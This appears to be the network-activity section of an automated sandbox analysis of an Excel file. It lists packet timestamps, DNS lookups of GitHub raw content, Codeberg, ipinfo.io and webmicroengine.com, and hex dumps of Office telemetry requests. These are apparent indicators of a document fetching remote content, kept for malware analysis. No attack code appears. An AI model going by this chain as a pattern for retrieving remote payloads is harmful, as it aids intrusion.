                                                                                                                                                                                          Dec 6, 2023 18:18:02.550225019 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.550245047 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.550331116 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.550335884 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.550375938 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.551177025 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.551198959 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.551275015 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.551279068 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.551320076 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.552037001 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.552054882 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.552128077 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.552131891 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.552174091 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.553114891 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.553138018 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.553208113 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.553212881 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.553251028 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.554174900 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.554202080 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.554261923 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.554267883 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.554307938 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.555088997 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.555107117 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.555151939 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.555156946 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.555182934 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.555202007 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.556312084 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.556329012 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.556415081 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.556420088 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.556458950 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.556822062 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.556839943 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.556893110 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.556898117 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.556936979 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.557363033 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.557378054 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.557430029 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.557435036 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.557487011 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.557952881 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.557967901 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.558029890 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.558033943 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.558062077 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.558088064 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.558465004 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.558482885 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.558548927 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.558553934 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.558592081 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.558938980 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.558954954 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.559000969 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.559005022 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.559029102 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.559030056 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.559052944 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.559056997 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.559082031 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.559101105 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.559115887 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.559163094 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.559210062 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.559226036 CET44349736185.199.111.133192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:02.559257030 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:02.559264898 CET49736443192.168.2.16185.199.111.133
                                                                                                                                                                                          Dec 6, 2023 18:18:10.252569914 CET49737443192.168.2.16217.197.91.145
                                                                                                                                                                                          Dec 6, 2023 18:18:10.252612114 CET44349737217.197.91.145192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:10.252696991 CET49737443192.168.2.16217.197.91.145
                                                                                                                                                                                          Dec 6, 2023 18:18:10.257603884 CET49737443192.168.2.16217.197.91.145
                                                                                                                                                                                          Dec 6, 2023 18:18:10.257627964 CET44349737217.197.91.145192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:10.649004936 CET44349737217.197.91.145192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:10.649221897 CET49737443192.168.2.16217.197.91.145
                                                                                                                                                                                          Dec 6, 2023 18:18:10.725528955 CET49737443192.168.2.16217.197.91.145
                                                                                                                                                                                          Dec 6, 2023 18:18:10.725558996 CET44349737217.197.91.145192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:10.725907087 CET44349737217.197.91.145192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:10.726012945 CET49737443192.168.2.16217.197.91.145
                                                                                                                                                                                          Dec 6, 2023 18:18:10.728806019 CET49737443192.168.2.16217.197.91.145
                                                                                                                                                                                          Dec 6, 2023 18:18:10.776741028 CET44349737217.197.91.145192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:11.056638956 CET44349737217.197.91.145192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:11.056838036 CET44349737217.197.91.145192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:11.056844950 CET49737443192.168.2.16217.197.91.145
                                                                                                                                                                                          Dec 6, 2023 18:18:11.056911945 CET49737443192.168.2.16217.197.91.145
                                                                                                                                                                                          Dec 6, 2023 18:18:11.062391996 CET49737443192.168.2.16217.197.91.145
                                                                                                                                                                                          Dec 6, 2023 18:18:11.062411070 CET44349737217.197.91.145192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:17.996742964 CET49738443192.168.2.1634.117.59.81
                                                                                                                                                                                          Dec 6, 2023 18:18:17.996789932 CET4434973834.117.59.81192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:17.997004032 CET49738443192.168.2.1634.117.59.81
                                                                                                                                                                                          Dec 6, 2023 18:18:18.001043081 CET49738443192.168.2.1634.117.59.81
                                                                                                                                                                                          Dec 6, 2023 18:18:18.001056910 CET4434973834.117.59.81192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:18.257915020 CET4434973834.117.59.81192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:18.258302927 CET49738443192.168.2.1634.117.59.81
                                                                                                                                                                                          Dec 6, 2023 18:18:18.335889101 CET49738443192.168.2.1634.117.59.81
                                                                                                                                                                                          Dec 6, 2023 18:18:18.335917950 CET4434973834.117.59.81192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:18.336189985 CET4434973834.117.59.81192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:18.338074923 CET49738443192.168.2.1634.117.59.81
                                                                                                                                                                                          Dec 6, 2023 18:18:18.343890905 CET49738443192.168.2.1634.117.59.81
                                                                                                                                                                                          Dec 6, 2023 18:18:18.384740114 CET4434973834.117.59.81192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:18.544189930 CET4434973834.117.59.81192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:18.544271946 CET4434973834.117.59.81192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:18.544306040 CET49738443192.168.2.1634.117.59.81
                                                                                                                                                                                          Dec 6, 2023 18:18:18.544404984 CET49738443192.168.2.1634.117.59.81
                                                                                                                                                                                          Dec 6, 2023 18:18:18.545861006 CET49738443192.168.2.1634.117.59.81
                                                                                                                                                                                          Dec 6, 2023 18:18:18.545891047 CET4434973834.117.59.81192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:18.946131945 CET49739443192.168.2.16190.123.45.87
                                                                                                                                                                                          Dec 6, 2023 18:18:18.946178913 CET44349739190.123.45.87192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:18.946273088 CET49739443192.168.2.16190.123.45.87
                                                                                                                                                                                          Dec 6, 2023 18:18:18.946784973 CET49739443192.168.2.16190.123.45.87
                                                                                                                                                                                          Dec 6, 2023 18:18:18.946799040 CET44349739190.123.45.87192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:19.301263094 CET44349739190.123.45.87192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:19.301431894 CET49739443192.168.2.16190.123.45.87
                                                                                                                                                                                          Dec 6, 2023 18:18:19.304810047 CET49739443192.168.2.16190.123.45.87
                                                                                                                                                                                          Dec 6, 2023 18:18:19.304822922 CET44349739190.123.45.87192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:19.305077076 CET44349739190.123.45.87192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:19.305146933 CET49739443192.168.2.16190.123.45.87
                                                                                                                                                                                          Dec 6, 2023 18:18:19.305573940 CET49739443192.168.2.16190.123.45.87
                                                                                                                                                                                          Dec 6, 2023 18:18:19.352754116 CET44349739190.123.45.87192.168.2.16
                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                          Dec 6, 2023 18:18:01.152230978 CET5650153192.168.2.161.1.1.1
                                                                                                                                                                                          Dec 6, 2023 18:18:01.247623920 CET53565011.1.1.1192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:10.149046898 CET6051353192.168.2.161.1.1.1
                                                                                                                                                                                          Dec 6, 2023 18:18:10.245065928 CET53605131.1.1.1192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:17.888087988 CET5236553192.168.2.161.1.1.1
                                                                                                                                                                                          Dec 6, 2023 18:18:17.983752012 CET53523651.1.1.1192.168.2.16
                                                                                                                                                                                          Dec 6, 2023 18:18:18.558686972 CET5508253192.168.2.161.1.1.1
                                                                                                                                                                                          Dec 6, 2023 18:18:18.944355011 CET53550821.1.1.1192.168.2.16
                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                          Dec 6, 2023 18:18:01.152230978 CET192.168.2.161.1.1.10x3967Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 6, 2023 18:18:10.149046898 CET192.168.2.161.1.1.10x8f9bStandard query (0)codeberg.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 6, 2023 18:18:17.888087988 CET192.168.2.161.1.1.10xaab3Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 6, 2023 18:18:18.558686972 CET192.168.2.161.1.1.10x7294Standard query (0)webmicroengine.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                          Dec 6, 2023 18:17:10.705240011 CET1.1.1.1192.168.2.160x876bNo error (0)templatesmetadata.office.nettemplatesmetadata.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Dec 6, 2023 18:17:26.675487995 CET1.1.1.1192.168.2.160xf0d3No error (0)dual.part-0012.t-0009.fbs1-t-msedge.netpart-0012.t-0009.fbs1-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Dec 6, 2023 18:17:26.675487995 CET1.1.1.1192.168.2.160xf0d3No error (0)part-0012.t-0009.fbs1-t-msedge.net13.107.219.40A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 6, 2023 18:17:26.675487995 CET1.1.1.1192.168.2.160xf0d3No error (0)part-0012.t-0009.fbs1-t-msedge.net13.107.227.40A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 6, 2023 18:18:01.247623920 CET1.1.1.1192.168.2.160x3967No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 6, 2023 18:18:01.247623920 CET1.1.1.1192.168.2.160x3967No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 6, 2023 18:18:01.247623920 CET1.1.1.1192.168.2.160x3967No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 6, 2023 18:18:01.247623920 CET1.1.1.1192.168.2.160x3967No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 6, 2023 18:18:10.245065928 CET1.1.1.1192.168.2.160x8f9bNo error (0)codeberg.org217.197.91.145A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 6, 2023 18:18:17.983752012 CET1.1.1.1192.168.2.160xaab3No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                                                                                                                          Dec 6, 2023 18:18:18.944355011 CET1.1.1.1192.168.2.160x7294No error (0)webmicroengine.com190.123.45.87A (IP address)IN (0x0001)false
                                                                                                                                                                                          • otelrules.azureedge.net
                                                                                                                                                                                          • raw.githubusercontent.com
                                                                                                                                                                                          • codeberg.org
                                                                                                                                                                                          • ipinfo.io
                                                                                                                                                                                          • webmicroengine.com
                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          0192.168.2.164973013.107.219.404435188C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2023-12-06 17:17:26 UTC207OUTGET /rules/rule324002v3s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2023-12-06 17:17:27 UTC555INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 36 30 34 38 30 30 2c 20 69 6d 6d 75 74 61 62 6c 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 38 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4d 44 35 3a 20 4e 5a 76 46 50 48 39 37 45 44 6b 55 49 67 52 4b 42 6e 70 50 57 51 3d 3d 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 32 20 4e 6f 76 20 32 30 32 33 20 30 32 3a 31 34 3a 31 30 20 47 4d 54 0d 0a 45 54 61 67 3a 20 30 78 38 44 42 45 42 30 30 42 36 43 36 32 35 36 43 0d 0a 58 2d 43 61 63 68 65 3a 20 54 43 50 5f 48 49 54 0d 0a 78 2d 6d 73 2d 72 65 71 75 65 73 74 2d 69 64
                                                                                                                                                                                          Data Ascii: HTTP/1.1 200 OKCache-Control: public, max-age=604800, immutableContent-Length: 868Content-Type: text/xmlContent-MD5: NZvFPH97EDkUIgRKBnpPWQ==Last-Modified: Wed, 22 Nov 2023 02:14:10 GMTETag: 0x8DBEB00B6C6256CX-Cache: TCP_HITx-ms-request-id
                                                                                                                                                                                          2023-12-06 17:17:27 UTC868INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 33 32 34 30 30 32 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 45 78 74 65 6e 73 69 62 69 6c 69 74 79 2e 56 62 61 54 65 6c 65 6d 65 74 72 79 44 65 63 6c 61 72 65 22 20 41 54 54 3d 22 64 62 33 33 34 62 33 30 31 65 37 62 34 37 34 64 62 35 65 30 66 30 32 66 30 37 63 35 31 61 34 37 2d 61 31 62 35 62 63 33 36 2d 31 62 62 65 2d 34 38 32 66 2d 61 36 34 61 2d 63 32 64 39 63 62 36 30 36 37 30 36 2d 37 34 33 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 42 22 20 44 43 61 3d 22 44 43 20 50 53 50 20 50 53 55 22 20 78 6d 6c 6e
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="324002" V="3" DC="SM" EN="Office.Extensibility.VbaTelemetryDeclare" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DL="B" DCa="DC PSP PSU" xmln


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          1192.168.2.164972913.107.219.404435188C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2023-12-06 17:17:26 UTC207OUTGET /rules/rule324001v3s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2023-12-06 17:17:27 UTC688INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 36 30 34 38 30 30 2c 20 69 6d 6d 75 74 61 62 6c 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4d 44 35 3a 20 4e 4d 7a 79 6a 71 71 7a 4e 52 45 54 72 65 36 73 6f 4f 73 74 7a 77 3d 3d 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 32 20 4e 6f 76 20 32 30 32 33 20 30 32 3a 31 34 3a 31 30 20 47 4d 54 0d 0a 45 54 61 67 3a 20 30 78 38 44 42 45 42 30 30 42 37 33 31 38 31 44 32 0d 0a 58 2d 43 61 63 68 65 3a 20 54 43 50 5f 48 49 54 0d 0a 78 2d 6d 73 2d 72 65 71 75 65 73 74 2d 69 64
                                                                                                                                                                                          Data Ascii: HTTP/1.1 200 OKCache-Control: public, max-age=604800, immutableContent-Length: 520Content-Type: text/xmlContent-MD5: NMzyjqqzNRETre6soOstzw==Last-Modified: Wed, 22 Nov 2023 02:14:10 GMTETag: 0x8DBEB00B73181D2X-Cache: TCP_HITx-ms-request-id
                                                                                                                                                                                          2023-12-06 17:17:27 UTC520INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 33 32 34 30 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 45 78 74 65 6e 73 69 62 69 6c 69 74 79 2e 56 62 61 54 65 6c 65 6d 65 74 72 79 50 72 6f 6a 65 63 74 4c 6f 61 64 22 20 41 54 54 3d 22 64 62 33 33 34 62 33 30 31 65 37 62 34 37 34 64 62 35 65 30 66 30 32 66 30 37 63 35 31 61 34 37 2d 61 31 62 35 62 63 33 36 2d 31 62 62 65 2d 34 38 32 66 2d 61 36 34 61 2d 63 32 64 39 63 62 36 30 36 37 30 36 2d 37 34 33 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 42 22 20 44 43 61 3d 22 44 43 20 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="324001" V="3" DC="SM" EN="Office.Extensibility.VbaTelemetryProjectLoad" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DL="B" DCa="DC PSP PSU"


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          2192.168.2.164972613.107.219.404435188C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2023-12-06 17:17:26 UTC207OUTGET /rules/rule324003v3s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2023-12-06 17:17:27 UTC555INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 36 30 34 38 30 30 2c 20 69 6d 6d 75 74 61 62 6c 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 37 35 31 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4d 44 35 3a 20 34 6c 6f 6a 44 37 2b 4f 34 75 61 74 48 54 67 47 57 46 63 7a 47 41 3d 3d 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 32 20 4e 6f 76 20 32 30 32 33 20 30 32 3a 31 34 3a 30 36 20 47 4d 54 0d 0a 45 54 61 67 3a 20 30 78 38 44 42 45 42 30 30 42 34 41 34 35 38 31 33 0d 0a 58 2d 43 61 63 68 65 3a 20 54 43 50 5f 48 49 54 0d 0a 78 2d 6d 73 2d 72 65 71 75 65 73 74 2d 69 64
                                                                                                                                                                                          Data Ascii: HTTP/1.1 200 OKCache-Control: public, max-age=604800, immutableContent-Length: 751Content-Type: text/xmlContent-MD5: 4lojD7+O4uatHTgGWFczGA==Last-Modified: Wed, 22 Nov 2023 02:14:06 GMTETag: 0x8DBEB00B4A45813X-Cache: TCP_HITx-ms-request-id
                                                                                                                                                                                          2023-12-06 17:17:27 UTC751INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 33 32 34 30 30 33 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 45 78 74 65 6e 73 69 62 69 6c 69 74 79 2e 56 62 61 54 65 6c 65 6d 65 74 72 79 52 65 66 65 72 65 6e 63 65 64 4c 69 62 72 61 72 79 22 20 41 54 54 3d 22 64 62 33 33 34 62 33 30 31 65 37 62 34 37 34 64 62 35 65 30 66 30 32 66 30 37 63 35 31 61 34 37 2d 61 31 62 35 62 63 33 36 2d 31 62 62 65 2d 34 38 32 66 2d 61 36 34 61 2d 63 32 64 39 63 62 36 30 36 37 30 36 2d 37 34 33 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 42 22 20 44 43 61 3d 22 44 43 20 50 53 50
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="324003" V="3" DC="SM" EN="Office.Extensibility.VbaTelemetryReferencedLibrary" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DL="B" DCa="DC PSP


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          3192.168.2.164972713.107.219.404435188C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2023-12-06 17:17:27 UTC207OUTGET /rules/rule324006v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
